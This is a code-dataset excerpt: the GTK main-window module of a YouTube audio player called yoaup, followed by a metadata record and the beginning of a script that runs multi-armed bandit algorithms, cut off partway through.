import comun\nfrom .comun import _\nfrom .sound_menu import SoundMenuControls\nfrom .player import Player\nfrom .player import Status\nfrom .configurator import Configuration\nfrom .listboxrowwithdata import ListBoxRowWithData\nfrom .fsync import fsync_function\nfrom .utils import from_remote_image_to_base64\nfrom .utils import get_thumbnail_filename_for_audio\nfrom .youtube_utils import resolve_youtube_url\nfrom .youtube_utils import parse_youtube_url\nfrom .youtube_utils import is_youtube_list\nfrom .youtube_utils import getPlaylistVideoUrls\nfrom .downloadermanager import DownloaderManager\nfrom .showinfodialog import ShowInfoDialog\nfrom .preferencesdialog import PreferencesDialog\n\nDEFAULT_CURSOR = Gdk.Cursor(Gdk.CursorType.ARROW)\nWAIT_CURSOR = Gdk.Cursor(Gdk.CursorType.WATCH)\n\nCSS = '''\n#button:hover,\n#button {\n border-image: none;\n background-image: none;\n background-color: rgba(0, 0, 0, 0);\n border-color: rgba(0, 0, 0, 0);\n border-image: none;\n border-radius: 0;\n border-width: 0;\n border-style: solid;\n text-shadow: 0 0 rgba(0, 0, 0, 0);\n box-shadow: 0 0 rgba(0, 0, 0, 0), 0 0 rgba(0, 0, 0, 0);\n}\n#button:hover{\n background-color: rgba(0, 0, 0, 0.1);\n}\n'''\n\n\ndef get_index_audio(audios, display_id):\n for index, audio in enumerate(audios):\n if audio['display_id'] == display_id:\n return index\n return -1\n\n\nclass MainWindow(Gtk.ApplicationWindow):\n __gsignals__ = {\n 'text-changed': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE,\n (object,)),\n 'save-me': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE,\n (object,)), }\n\n def __init__(self, app, afile=None):\n Gtk.ApplicationWindow.__init__(self, application=app)\n\n self.set_position(Gtk.WindowPosition.CENTER_ALWAYS)\n self.set_icon_from_file(comun.ICON)\n self.set_default_size(600, 600)\n self.connect('destroy', self.on_close)\n\n self.get_root_window().set_cursor(WAIT_CURSOR)\n\n self.active_row = None\n self.updater = None\n self.configuration = Configuration()\n\n max_action = Gio.SimpleAction.new_stateful(\n \"maximize\", None, GLib.Variant.new_boolean(False))\n max_action.connect(\"change-state\", self.on_maximize_toggle)\n self.add_action(max_action)\n\n self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)\n self.notification = Notify.Notification.new('', '', None)\n\n self.player = Player()\n self.player.connect('started', self.on_player_started)\n self.player.connect('paused', self.on_player_paused)\n self.player.connect('stopped', self.on_player_stopped)\n\n DBusGMainLoop(set_as_default=True)\n self.sound_menu = SoundMenuControls('LPLAYER')\n self.sound_menu._sound_menu_is_playing = self._sound_menu_is_playing\n self.sound_menu._sound_menu_play = self._sound_menu_play\n self.sound_menu._sound_menu_pause = self._sound_menu_pause\n self.sound_menu._sound_menu_next = self._sound_menu_next\n self.sound_menu._sound_menu_previous = self._sound_menu_previous\n self.sound_menu._sound_menu_raise = self._sound_menu_raise\n self.sound_menu._sound_menu_stop = self._sound_menu_stop\n\n # Vertical box. 
Contains menu and PaneView\n vbox = Gtk.VBox(False, 2)\n self.add(vbox)\n #\n\n # Init HeaderBar\n self.init_headerbar()\n\n # Init Menu\n # self.init_menu()\n\n # Init Toolbar\n # self.init_toolbar()\n #\n scrolledwindow = Gtk.ScrolledWindow()\n scrolledwindow.set_policy(Gtk.PolicyType.AUTOMATIC,\n Gtk.PolicyType.AUTOMATIC)\n scrolledwindow.set_shadow_type(Gtk.ShadowType.ETCHED_OUT)\n scrolledwindow.set_visible(True)\n vbox.pack_start(scrolledwindow, True, True, 0)\n\n self.trackview = Gtk.ListBox()\n self.trackview.connect('row-activated', self.on_row_activated)\n self.trackview.connect('row-selected', self.on_row_selected)\n self.trackview.connect('selected-rows-changed',\n self.on_row_selected_changed)\n self.trackview.set_activate_on_single_click(False)\n self.trackview.set_selection_mode(Gtk.SelectionMode.MULTIPLE)\n scrolledwindow.add(self.trackview)\n\n for index, track in enumerate(self.configuration.get('audios')):\n row = ListBoxRowWithData(track, index)\n row.connect('button_play_pause_clicked', self.on_row_play, row)\n row.connect('button_info_clicked', self.on_row_info, row)\n row.connect('button_listened_clicked', self.on_row_listened, row)\n row.connect('button_download_clicked', self.on_row_download, row)\n row.show()\n self.trackview.add(row)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n row = self.trackview.get_row_at_index(0)\n self.trackview.handler_block_by_func(self.on_row_selected)\n self.trackview.select_row(row)\n self.trackview.handler_unblock_by_func(self.on_row_selected)\n\n self.downloaderManager = DownloaderManager()\n\n self.load_css()\n self.show_all()\n self.play_controls.set_visible(True)\n if len(self.trackview.get_children()) > 0:\n self.set_active_row(self.trackview.get_row_at_index(0))\n\n def on_close(self, widget):\n self.configuration.save()\n\n def on_download_all_clicked(self, widget):\n for row in self.trackview.get_children():\n self.on_row_download(None, row)\n\n def on_preferences_clicked(self, widget):\n self.configuration.save()\n cm = PreferencesDialog(self)\n if cm.run() == Gtk.ResponseType.ACCEPT:\n cm.hide()\n cm.save_preferences()\n self.configuration.read()\n cm.destroy()\n\n def on_maximize_toggle(self, action, value):\n action.set_state(value)\n if value.get_boolean():\n self.maximize()\n else:\n self.unmaximize()\n\n def on_row_download_started(self, widget, row):\n row.set_downloading(True)\n\n def on_row_download_ended(self, widget, row):\n row.set_downloading(False)\n filename = os.path.join(comun.AUDIO_DIR,\n '{0}.ogg'.format(row.audio['display_id']))\n if os.path.exists(filename):\n row.set_downloaded(True)\n duration = OggVorbis(filename).info.length\n row.set_duration(duration)\n else:\n row.set_downloaded(False)\n self.set_audio(row.audio)\n self.configuration.save()\n\n def on_row_download_failed(self, widget, row):\n row.set_downloading(False)\n row.set_downloaded(False)\n\n def on_row_download(self, widget, row):\n if row.audio['downloaded'] is True:\n filename = os.path.join(comun.AUDIO_DIR,\n '{0}.ogg'.format(row.audio['display_id']))\n if os.path.exists(filename):\n row.set_downloaded(False)\n else:\n self.downloaderManager.add(row)\n self.downloaderManager.connect('started',\n self.on_row_download_started)\n self.downloaderManager.connect('ended',\n self.on_row_download_ended)\n self.downloaderManager.connect('failed',\n self.on_row_download_failed)\n\n def on_row_listened(self, widget, row):\n listened = not row.audio['listened']\n row.set_listened(listened)\n self.set_audio(row.audio)\n\n def 
on_row_info(self, widget, row):\n sid = ShowInfoDialog(self,\n row.audio['creator'],\n row.audio['title'],\n row.audio['url'],\n row.audio['description'])\n sid.run()\n sid.hide()\n sid.destroy()\n\n def on_row_play(self, widget, row):\n if self.active_row is not None and self.active_row != row and\\\n self.active_row.is_playing is True:\n self.active_row.set_playing(False)\n self.player.pause()\n self.control['play-pause'].get_child().set_from_gicon(\n Gio.ThemedIcon(name='media-playback-start-symbolic'),\n Gtk.IconSize.BUTTON)\n self.control['play-pause'].set_tooltip_text(_('Play'))\n self.set_active_row(row)\n if self.active_row.is_playing is False:\n filename = os.path.join(comun.AUDIO_DIR,\n '{0}.ogg'.format(row.audio['display_id']))\n\n self.player.set_filename(filename)\n self.player.set_speed(self.configuration.get('speed'))\n self.player.set_remove_silence(\n self.configuration.get('remove_silence'))\n self.player.set_equalizaer(self.configuration.get('equalizer'))\n\n fraction = float(self.active_row.get_position())\n self.control['position'].handler_block_by_func(\n self.on_position_button_changed)\n self.control['position'].set_value(fraction)\n self.control['label-position'].set_text(\n _('Position') + ': {0}%'.format(int(fraction * 100)))\n self.control['position'].handler_unblock_by_func(\n self.on_position_button_changed)\n self.control['play-pause'].get_child().set_from_gicon(\n Gio.ThemedIcon(name='media-playback-pause-symbolic'),\n Gtk.IconSize.BUTTON)\n self.control['play-pause'].set_tooltip_text(_('Pause'))\n if self.active_row.get_position() > 0:\n self.player.set_position(\n self.active_row.audio['position'] *\n float(self.active_row.audio['duration']))\n artists = ['']\n album = self.active_row.audio['title']\n title = self.active_row.audio['title']\n album_art = 'file://' + get_thumbnail_filename_for_audio(\n self.active_row.audio)\n self.sound_menu.song_changed(artists, album, title, album_art)\n self.sound_menu.signal_playing()\n\n self.notification.update('{0} - {1}'.format(\n 'YOAUP',\n album),\n title,\n album_art)\n self.notification.show()\n\n if self.active_row.audio['position'] > 0 and\\\n self.active_row.audio['position'] <= 1:\n self.player.set_position(\n self.active_row.audio['position'] *\n float(self.active_row.audio['duration']))\n self.player.play()\n self.updater = GLib.timeout_add_seconds(1, self.update_position)\n self.active_row.set_playing(True)\n else:\n artists = [self.active_row.audio['creator']]\n album = self.active_row.audio['title']\n title = self.active_row.audio['title']\n album_art = 'file://' + get_thumbnail_filename_for_audio(\n self.active_row.audio)\n self.sound_menu.song_changed(artists, album, title, album_art)\n self.sound_menu.signal_paused()\n\n self.player.pause()\n self.control['play-pause'].get_child().set_from_gicon(\n Gio.ThemedIcon(name='media-playback-start-symbolic'),\n Gtk.IconSize.BUTTON)\n self.control['play-pause'].set_tooltip_text(_('Play'))\n\n self.active_row.set_playing(False)\n audios = self.configuration.get('audios')\n audio_index = get_index_audio(\n audios, self.active_row.audio['display_id'])\n audios[audio_index]['position'] = self.active_row.audio['position']\n self.configuration.set('audios', audios)\n\n def _sound_menu_is_playing(self):\n return self.player.status == Status.PLAYING\n\n def _sound_menu_play(self, *args):\n \"\"\"Play\"\"\"\n # self.is_playing = True # Need to overwrite\n row = self.active_row\n if row is None:\n self.set_active_row(self.trackview.get_row_at_index(0))\n 
self.active_row.click_button_play()\n\n    def _sound_menu_stop(self):\n        \"\"\"Stop\"\"\"\n        exit(0)  # quits the whole app; the pause fallback below is unreachable\n        if self.active_row is not None and self.active_row.is_playing is True:\n            self.active_row.click_button_play()\n\n    def _sound_menu_pause(self, *args):\n        \"\"\"Pause\"\"\"\n        if self.active_row is not None:\n            self.active_row.click_button_play()\n\n    def _sound_menu_next(self, *args):\n        \"\"\"Next\"\"\"\n        index = self.get_next_playable_track()\n        if index is not None:\n            row = self.trackview.get_row_at_index(index)\n            row.click_button_play()\n\n    def _sound_menu_previous(self, *args):\n        \"\"\"Previous\"\"\"\n        index = self.get_previous_playable_track()\n        if index is not None:\n            row = self.trackview.get_row_at_index(index)\n            row.click_button_play()\n\n    def _sound_menu_raise(self):\n        \"\"\"Click on player\"\"\"\n        self.show()\n\n    def on_row_selected(self, widget, row):\n        pass\n\n    def get_playable_tracks(self):\n        playables = []\n        for index in range(0, len(self.trackview.get_children())):\n            if self.trackview.get_row_at_index(index).can_play():\n                playables.append(index)\n        return sorted(playables)\n\n    def get_next_playable_track(self):\n        playables = self.get_playable_tracks()\n        if len(playables) > 0:\n            if self.active_row is not None and\\\n                    self.active_row.index in playables:\n                selected = playables.index(self.active_row.index)\n                nxt = selected + 1\n                if nxt >= len(playables):\n                    nxt = 0\n                return playables[nxt]\n            else:\n                return playables[0]\n        return None\n\n    def get_previous_playable_track(self):\n        playables = self.get_playable_tracks()\n        if len(playables) > 0:\n            if self.active_row is not None and\\\n                    self.active_row.index in playables:\n                selected = playables.index(self.active_row.index)\n                previous = selected - 1\n                if previous < 0:\n                    previous = len(playables) - 1\n                return playables[previous]\n            else:\n                return playables[0]\n        return None\n\n    def set_audio(self, audio):\n        # the loop variable must not shadow the ``audio`` argument,\n        # otherwise the display_id comparison is always True\n        audios = self.configuration.get('audios')\n        for index, item in enumerate(audios):\n            if item['display_id'] == audio['display_id']:\n                audios[index] = audio\n                self.configuration.set('audios', audios)\n                break\n\n    def update_position(self):\n        if self.active_row is not None:\n            position = self.player.get_position() / float(\n                self.active_row.audio['duration'])\n            if position >= 0:\n                self.active_row.set_position(position)\n                self.set_audio(self.active_row.audio)\n\n                self.control['position'].handler_block_by_func(\n                    self.on_position_button_changed)\n                self.control['position'].set_value(int(position * 100))\n                self.control['label-position'].set_text(\n                    _('Position') + ': {0}%'.format(int(position * 100)))\n                self.control['position'].handler_unblock_by_func(\n                    self.on_position_button_changed)\n            if position >= 0.99:\n                self.active_row.set_listened(True)\n                self.active_row.set_position(0)\n                if self.configuration.get('remove_on_listened') is True:\n                    self.active_row.set_downloaded(False)\n                self.set_audio(self.active_row.audio)\n                if self.active_row.is_playing is True:\n                    self.active_row.set_playing(False)\n                    self.player.pause()\n                    self._sound_menu_next()\n        return self.player.status == Status.PLAYING\n\n    def on_player_started(self, player, position):\n        pass\n\n    def on_player_paused(self, player, position):\n        pass\n\n    def on_player_stopped(self, player, position):\n        pass\n\n    def on_row_selected_changed(self, widget):\n        pass\n\n    def on_row_activated(self, widget, row):\n        self.set_active_row(row)\n\n    def on_downloader_failed(self, widget, row, filename):\n        if os.path.exists(filename):\n            os.remove(filename)\n        row.set_downloading(False)\n        row.set_downloaded(False)\n\n        
self.control['play-pause'].set_sensitive(False)\n self.control['speed'].set_sensitive(False)\n self.control['position'].set_sensitive(False)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n def on_downloader_ended(self, widget, row, filename):\n if os.path.exists(filename):\n filename = filename.split('/')[-1]\n\n # self.db.set_track_downloaded(row.data['id'], filename)\n # self.configuration.get('audios')\n row.set_downloading(False)\n row.set_downloaded(True)\n\n self.control['play-pause'].set_sensitive(True)\n self.control['speed'].set_sensitive(True)\n self.control['position'].set_sensitive(True)\n\n self.set_audio(row.audio)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n def on_play_continuously_changed(self, widget, value):\n self.configuration.set('play_continuously', widget.get_active())\n\n def on_remove_silence_changed(self, widget, value):\n self.player.set_remove_silence(widget.get_active())\n self.configuration.set('remove_silence', widget.get_active())\n\n def on_speed_button_changed(self, widget):\n value = widget.get_value()\n self.control['label-speed'].set_text(\n _('Speed') + ': {0}x'.format(int(value * 10) / 10))\n self.player.set_speed(value)\n self.configuration.set('speed', value)\n\n def on_position_button_changed(self, widget):\n value = widget.get_value()\n\n self.control['label-position'].set_label(\n _('Position' + ': {0}%'.format(int(value))))\n if self.active_row is not None:\n value = float(value) / 100.0\n if value >= 0.0 and value <= 1.0:\n self.active_row.set_position(value)\n self.set_audio(self.active_row.audio)\n self.player.set_position(\n value * float(self.active_row.audio['duration']))\n\n def init_headerbar(self):\n self.control = {}\n self.menu_selected = 'suscriptions'\n #\n hb = Gtk.HeaderBar()\n hb.set_show_close_button(True)\n hb.props.title = comun.APPNAME\n self.set_titlebar(hb)\n\n self.play_controls = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 5)\n hb.pack_start(self.play_controls)\n\n popover = Gtk.Popover()\n popover_grid = Gtk.Grid()\n popover_grid.set_margin_top(10)\n popover_grid.set_margin_bottom(10)\n popover_grid.set_margin_left(10)\n popover_grid.set_margin_right(10)\n popover_grid.set_column_spacing(5)\n popover_grid.set_row_spacing(5)\n popover.add(popover_grid)\n\n self.control['label-position'] = Gtk.Label(_('Position') + ':')\n self.control['label-position'].set_alignment(0, 0.5)\n popover_grid.attach(self.control['label-position'], 0, 0, 5, 1)\n self.control['position'] = Gtk.Scale()\n self.control['position'].set_tooltip_text(\n _('Relative position'))\n self.control['position'].set_adjustment(\n Gtk.Adjustment(0, 0, 100, 1, 1, 5))\n self.control['position'].connect('value-changed',\n self.on_position_button_changed)\n self.control['position'].set_value(0)\n popover_grid.attach(self.control['position'], 5, 0, 5, 1)\n\n self.control['label-speed'] = Gtk.Label(_('Speed') + ':')\n self.control['label-speed'].set_alignment(0, 0.5)\n popover_grid.attach(self.control['label-speed'], 0, 1, 5, 1)\n self.control['speed'] = Gtk.Scale()\n self.control['speed'].set_adjustment(Gtk.Adjustment(\n 1, 0.5, 4, 0.1, 0.1, 1))\n self.control['speed'].set_size_request(200, 0)\n self.control['speed'].connect('value-changed',\n self.on_speed_button_changed)\n self.control['speed'].set_value(self.configuration.get('speed'))\n popover_grid.attach(self.control['speed'], 5, 1, 5, 1)\n\n label = Gtk.Label(_('Remove silence') + ':')\n label.set_alignment(0, 0.5)\n popover_grid.attach(label, 0, 2, 5, 1)\n\n self.control['remove-silence'] 
= Gtk.Switch()\n self.control['remove-silence'].set_active(\n self.configuration.get('remove_silence'))\n self.control['remove-silence'].connect(\n 'notify::active', self.on_remove_silence_changed)\n tbox = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 0)\n tbox.add(self.control['remove-silence'])\n popover_grid.attach(tbox, 5, 2, 5, 1)\n\n label = Gtk.Label(_('Play continuously') + ':')\n label.set_alignment(0, 0.5)\n popover_grid.attach(label, 0, 3, 5, 1)\n\n self.control['play_continuously'] = Gtk.Switch()\n self.control['play_continuously'].set_active(\n self.configuration.get('play_continuously'))\n self.control['play_continuously'].connect(\n 'notify::active', self.on_play_continuously_changed)\n tbox = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 0)\n tbox.add(self.control['play_continuously'])\n popover_grid.attach(tbox, 5, 3, 5, 1)\n\n popover_grid.attach(Gtk.Label(_('Equalizer')), 0, 4, 10, 1)\n\n for index in range(0, 10):\n band = 'band{0}'.format(index)\n self.control[band] = Gtk.Scale.new_with_range(\n Gtk.Orientation.VERTICAL, -24.0, 12.0, 0.1)\n self.control[band].set_size_request(0, 200)\n self.control[band].set_value(\n self.configuration.get('equalizer')[band])\n self.control[band].connect('value-changed',\n self.on_band_changed, band)\n popover_grid.attach(self.control[band], index, 5, 1, 1)\n\n popover_grid.show_all()\n\n self.control['configuration'] = Gtk.MenuButton()\n self.control['configuration'].set_tooltip_text(_('Configuration'))\n self.control['configuration'].add(\n Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='preferences-system-symbolic'), Gtk.IconSize.BUTTON))\n self.control['configuration'].set_popover(popover)\n self.play_controls.pack_start(self.control['configuration'],\n False, False, 0)\n\n self.control['previous'] = Gtk.Button()\n self.control['previous'].set_tooltip_text(_('Previous'))\n self.control['previous'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='go-next-symbolic-rtl'), Gtk.IconSize.BUTTON))\n self.control['previous'].connect('clicked',\n self._sound_menu_previous)\n self.play_controls.pack_start(self.control['previous'],\n False, False, 0)\n\n self.control['play-pause'] = Gtk.Button()\n self.control['play-pause'].set_tooltip_text(_('Play'))\n self.control['play-pause'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='media-playback-start-symbolic'), Gtk.IconSize.BUTTON))\n self.control['play-pause'].connect('clicked',\n self._sound_menu_play)\n self.play_controls.pack_start(self.control['play-pause'],\n False, False, 0)\n\n self.control['next'] = Gtk.Button()\n self.control['next'].set_tooltip_text(_('Next'))\n self.control['next'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='go-next-symbolic'), Gtk.IconSize.BUTTON))\n self.control['next'].connect('clicked',\n self._sound_menu_next)\n self.play_controls.pack_start(self.control['next'], False, False, 0)\n\n help_model = Gio.Menu()\n\n help_section0_model = Gio.Menu()\n help_section0_model.append(_('Download all'), 'app.download_all')\n help_section0_model.append(_('Preferences'), 'app.set_preferences')\n help_section0 = Gio.MenuItem.new_section(None, help_section0_model)\n help_model.append_item(help_section0)\n\n help_section1_model = Gio.Menu()\n help_section1_model.append(_('Homepage'), 'app.goto_homepage')\n help_section1 = Gio.MenuItem.new_section(None, help_section1_model)\n help_model.append_item(help_section1)\n\n help_section2_model = Gio.Menu()\n help_section2_model.append(_('Code'), 'app.goto_code')\n help_section2_model.append(_('Issues'), 'app.goto_bug')\n 
help_section2 = Gio.MenuItem.new_section(None, help_section2_model)\n help_model.append_item(help_section2)\n\n help_section3_model = Gio.Menu()\n help_section3_model.append(_('Twitter'), 'app.goto_twitter')\n help_section3_model.append(_('Facebook'), 'app.goto_facebook')\n help_section3_model.append(_('Google+'), 'app.goto_google_plus')\n help_section3 = Gio.MenuItem.new_section(None, help_section3_model)\n help_model.append_item(help_section3)\n\n help_section4_model = Gio.Menu()\n help_section4_model.append(_('Donations'), 'app.goto_donate')\n help_section4 = Gio.MenuItem.new_section(None, help_section4_model)\n help_model.append_item(help_section4)\n\n help_section5_model = Gio.Menu()\n help_section5_model.append(_('About'), 'app.about')\n help_section5 = Gio.MenuItem.new_section(None, help_section5_model)\n help_model.append_item(help_section5)\n\n self.control['help'] = Gtk.MenuButton()\n self.control['help'].set_menu_model(help_model)\n self.control['help'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='open-menu-symbolic'), Gtk.IconSize.BUTTON))\n hb.pack_end(self.control['help'])\n\n self.control['remove'] = Gtk.Button()\n self.control['remove'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='list-remove-symbolic'), Gtk.IconSize.BUTTON))\n self.control['remove'].connect('clicked', self.on_remove_track)\n hb.pack_end(self.control['remove'])\n\n self.popover_add = Gtk.Popover()\n popover_add_grid = Gtk.Grid()\n self.popover_add.add(popover_add_grid)\n popover_add_grid.attach(Gtk.Label(_('YouTube url') + ':'),\n 0, 0, 1, 1)\n self.control['add_entry'] = Gtk.SearchEntry()\n self.control['add_entry'].connect('activate',\n self.on_add_entry_clicked)\n popover_add_grid.attach(self.control['add_entry'], 1, 0, 1, 1)\n popover_add_grid.show_all()\n # popover_add.show_all()\n\n self.control['add'] = Gtk.MenuButton()\n self.control['add'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='list-add-symbolic'), Gtk.IconSize.BUTTON))\n self.control['add'].set_popover(self.popover_add)\n hb.pack_end(self.control['add'])\n\n def on_band_changed(self, widget, band):\n equalizer = self.configuration.get('equalizer')\n equalizer[band] = widget.get_value()\n self.configuration.set('equalizer', equalizer)\n self.player.set_equalizer_by_band(int(band[4:]), widget.get_value())\n print(widget, band, int(band[4:]))\n\n def on_add_entry_clicked(self, widget):\n text = widget.get_text()\n self.add_track(text)\n widget.get_buffer().delete_text(0, -1)\n self.popover_add.hide()\n\n def on_remove_track(self, widget):\n if self.active_row is not None:\n if len(self.trackview.get_selected_rows()) > 1:\n msg = _('Are you sure to delete the tracks')\n else:\n msg = _('Are you sure to delete the track')\n dialog = Gtk.MessageDialog(\n self,\n 0,\n Gtk.MessageType.WARNING,\n Gtk.ButtonsType.OK_CANCEL,\n msg)\n if dialog.run() == Gtk.ResponseType.OK:\n dialog.destroy()\n audios = self.configuration.get('audios')\n for row in self.trackview.get_selected_rows():\n audios.remove(row.audio)\n self.configuration.set('audios', audios)\n self.trackview.remove(row)\n extension = row.audio['ext']\n audio_id = row.audio['display_id']\n filein = os.path.join(\n comun.AUDIO_DIR,\n '{0}.{1}'.format(audio_id, extension))\n fileout = os.path.join(\n comun.AUDIO_DIR,\n '{0}.{1}'.format(audio_id, 'ogg'))\n if os.path.exists(filein):\n os.remove(filein)\n if os.path.exists(fileout):\n os.remove(fileout)\n self.trackview.show_all()\n if self.active_row.audio == row.audio and\\\n len(self.trackview.get_children()) > 0:\n 
self.set_active_row(self.trackview.get_row_at_index(0))\n else:\n self.set_active_row()\n else:\n dialog.destroy()\n\n def set_active_row(self, row=None):\n self.trackview.unselect_all()\n self.active_row = row\n if row is not None:\n self.trackview.select_row(row)\n\n def add_track(self, text):\n\n def on_add_track_in_thread_done(result, error):\n if error is None and result is not None:\n audios = self.configuration.get('audios')\n for audio in audios:\n if audio == result:\n return\n audios.append(result)\n self.configuration.set('audios', audios)\n row = ListBoxRowWithData(result, len(audios) - 1)\n row.connect('button_play_pause_clicked',\n self.on_row_play,\n row)\n row.connect('button_info_clicked', self.on_row_info, row)\n row.connect('button_listened_clicked',\n self.on_row_listened,\n row)\n row.connect('button_download_clicked',\n self.on_row_download,\n row)\n row.show()\n self.trackview.add(row)\n self.trackview.show_all()\n\n self.configuration.set('audios', audios)\n self.configuration.save()\n if self.configuration.get('download_on_added') is True:\n self.on_row_download(None, row)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n @fsync_function(on_done=on_add_track_in_thread_done)\n def do_add_track_in_thread(url):\n result = resolve_youtube_url(url)\n if result is not None:\n for audio in self.configuration.get('audios'):\n if result == audio:\n return None\n if result['thumbnail'] is not None:\n thumbnail_base64 = from_remote_image_to_base64(\n result['thumbnail'])\n if thumbnail_base64 is not None:\n result['thumbnail_base64'] = thumbnail_base64\n return result\n\n if is_youtube_list(text) is True:\n for url in getPlaylistVideoUrls(text):\n self.get_root_window().set_cursor(WAIT_CURSOR)\n do_add_track_in_thread(url)\n else:\n url = parse_youtube_url(text)\n if url is not None:\n self.get_root_window().set_cursor(WAIT_CURSOR)\n do_add_track_in_thread(url)\n\n def on_toggled(self, widget, arg):\n if widget.get_active() is True:\n if arg == self.menu_selected:\n if self.menu[arg].get_active() is False:\n self.menu[arg].set_active(True)\n else:\n old = self.menu_selected\n self.menu_selected = arg\n self.menu[old].set_active(False)\n else:\n if self.menu_selected == arg:\n widget.set_active(True)\n\n def load_css(self):\n style_provider = Gtk.CssProvider()\n style_provider.load_from_data(CSS.encode())\n Gtk.StyleContext.add_provider_for_screen(\n Gdk.Screen.get_default(),\n style_provider,\n Gtk.STYLE_PROVIDER_PRIORITY_USER)\n","repo_name":"atareao/yoaup","sub_path":"src/yoaup/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":33809,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"8463442574","text":"\"\"\"Simple script to run snips of code\"\"\"\n# Standard Libraries\nimport os\nimport sys\nos.chdir(os.path.dirname(__file__))\n\n# Third party libraries\nfrom icecream import ic\n\n# Local imports\nfrom algorl.logs import logging\nfrom algorl.src.bandit import *\n\nlogger = logging.getLogger(__name__)\n\nfrom abc import ABC, abstractmethod\nclass MABExamples(ABC):\n '''Operations'''\n @abstractmethod\n def mab():\n pass\n\nclass OnlyExploitationRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n best_action_percentages = []\n for num in range(150):\n print(num)\n oe = OnlyExploitation(bandits)\n tot_return, best_action_percentage = oe.simulate(time = times)\n # bandits.plot_true_mean_vs_estimation(pic_name)\n # regret = 
oe.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return)\n best_action_percentages.append(best_action_percentage)\n # print(best_action_percentage)\n print(np.mean([best_action_percentages], axis=1)[0])\n# \"\"\"\nclass GreedySampleAverages(MABExamples):\n ''' Test the greedy algorithm with sample_averages '''\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n greedy = Greedy(bandits)\n tot_return, best_action_percentage = greedy.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n regret = greedy.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return)\n ic(regret)\n # print((greedy.bandits.bandit_df.loc['action_count', :]*greedy.bandits.bandit_df.loc['q_estimation', :]).sum())\n\n\nclass GreedyStepSize(MABExamples):\n ''' Test the greedy algorithm with step_size '''\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n greedy = Greedy(bandits, sample_averages=False, step_size=0.1)\n tot_return, best_action_percentage = greedy.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((greedy.bandits.bandit_df.loc['action_count', :]*greedy.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(greedy.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass GreedySampleAveragesWithInitials(MABExamples):\n '''\n Test the greedy algorithm with optimistic initial values\n '''\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n greedy = Greedy(bandits, sample_averages=True, initial_values=10)\n tot_return, best_action_percentage = greedy.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((greedy.bandits.bandit_df.loc['action_count', :]*greedy.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(greedy.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass UCBRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n ucb = UCB(bandits)\n tot_return, best_action_percentage = ucb.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((ucb.bandits.bandit_df.loc['action_count', :]*ucb.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(ucb.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass GaussianThompsonSamplingRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n gts = GaussianThompsonSampling(bandits=bandits)\n tot_return, best_action_percentage = gts.simulate(time=times) \n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((gts.bandits.bandit_df.loc['action_count', :]*gts.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(gts.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass GBARun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n gba = GBA(bandits)\n tot_return, best_action_percentage = gba.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((gba.bandits.bandit_df.loc['action_count', :]*gba.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(gba.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n# \"\"\"\n\"\"\"\nclass BernoulliThompsonSamplingRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n bernoulli_bandits = BernoulliBandits(number_of_arms = 5, q_mean=[0.1, 0.2, 0.5, 0.05, 
